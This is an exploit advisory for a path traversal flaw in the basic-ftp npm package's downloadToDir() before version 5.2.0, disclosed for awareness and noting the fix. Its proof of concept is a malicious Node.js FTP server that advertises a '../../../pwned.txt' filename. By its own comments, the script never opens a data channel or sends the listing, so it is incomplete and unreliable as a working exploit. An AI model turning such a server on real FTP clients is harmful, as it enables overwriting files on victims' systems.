=============================================================================================================================================
| # Title     : basic-ftp prior to version 5.2.0 Path Traversal in downloadToDir() via Malicious FTP LIST Response
| # Author    : indoushka
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)
| # Vendor    : https://www.npmjs.com/package/basic-ftp
=============================================================================================================================================

[+] Summary :

A path traversal vulnerability (CWE-22) exists in basic-ftp prior to version 5.2.0 within the downloadToDir() method. The issue occurs when a malicious FTP server returns crafted directory listings containing traversal sequences such as ../. The vulnerable client fails to properly sanitize or validate the received filenames before writing them to disk. As a result, files can be written outside the intended download directory, potentially leading to arbitrary file overwrite, application compromise, or further exploitation depending on execution context and privileges.

Version 5.2.0 resolves the issue by normalizing and validating resolved paths to ensure they remain within the designated download directory.
[+] POC :

// file: server.js
// Minimal fake FTP control channel that answers the commands a client sends
// before requesting a directory listing. Listens on port 2121.
const net = require("net");

const PORT = 2121;
// Filename the LIST reply advertises; it carries the traversal sequences.
const TRAVERSAL_FILE = "../../../pwned.txt";

const server = net.createServer((socket) => {
  console.log("Client connected");
  socket.write("220 Welcome to Malicious FTP\r\n");

  socket.on("data", (data) => {
    const message = data.toString();
    console.log("Received:", message.trim());

    if (message.startsWith("USER")) {
      socket.write("331 Password required\r\n");
    } else if (message.startsWith("PASS")) {
      socket.write("230 User logged in\r\n");
    } else if (message.startsWith("SYST")) {
      socket.write("215 UNIX Type: L8\r\n");
    } else if (message.startsWith("TYPE")) {
      socket.write("200 Type set to I\r\n");
    } else if (message.startsWith("PASV")) {
      // Passive-mode reply only; this script sets up no data-channel listener.
      socket.write("227 Entering Passive Mode (127,0,0,1,78,52)\r\n");
    } else if (message.startsWith("LIST")) {
      socket.write("150 Opening ASCII mode data connection for file list\r\n");
      // Unix-style listing line containing the traversal filename. As written,
      // the line is built but never transmitted, since no data connection exists.
      const payload = `-rw-r--r-- 1 ftp ftp 1337 Jan 01 2026 ${TRAVERSAL_FILE}\r\n`;
      socket.write("226 Transfer complete\r\n");
    } else {
      socket.write("200 Command okay\r\n");
    }
  });
});

server.listen(PORT, () => {
  console.log(`Malicious FTP Server running on port ${PORT}`);
});

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================